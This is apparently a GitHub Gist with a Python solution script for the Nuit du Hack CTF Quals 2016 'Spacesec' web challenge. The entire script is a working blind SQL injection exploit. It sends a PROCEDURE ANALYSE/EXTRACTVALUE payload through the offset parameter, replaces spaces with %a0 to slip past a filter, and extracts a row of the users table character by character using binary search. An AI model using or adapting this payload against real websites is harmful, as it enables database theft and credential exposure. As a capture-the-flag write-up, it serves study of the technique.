Last active
April 4, 2016 21:01
-
-
Save st98/ac3a3ccd17150d3e4de5ef3e522e21f2 to your computer and use it in GitHub Desktop.
Nuit du Hack CTF Quals 2016 - [web 300] Spacesec
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
def check(s): | |
return b'1108' in s | |
payload = "1 Procedure Analyse (Extractvalue (0, case when (Select substr(c.b, {}, 1) <= 0x{:02x} From (Select 0x41 a,0x42 b Union Select * From users limit 1 offset 3)c) then 0x2f else 0x40 end), 1)#".replace(' ', '%a0').replace('#', '%23') | |
url = 'http://spacesec.quals.nuitduhack.com/index.php?offset=' | |
result = '' | |
i = 1 | |
while True: | |
a = 0x7e | |
b = -1 | |
while abs(a - b) > 1: | |
mid = (a + b) // 2 | |
c = requests.get(url + payload.format(i, mid)).content | |
if check(c): | |
a = mid | |
else: | |
b = mid | |
result += chr(a) | |
print(i, result) | |
i += 1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment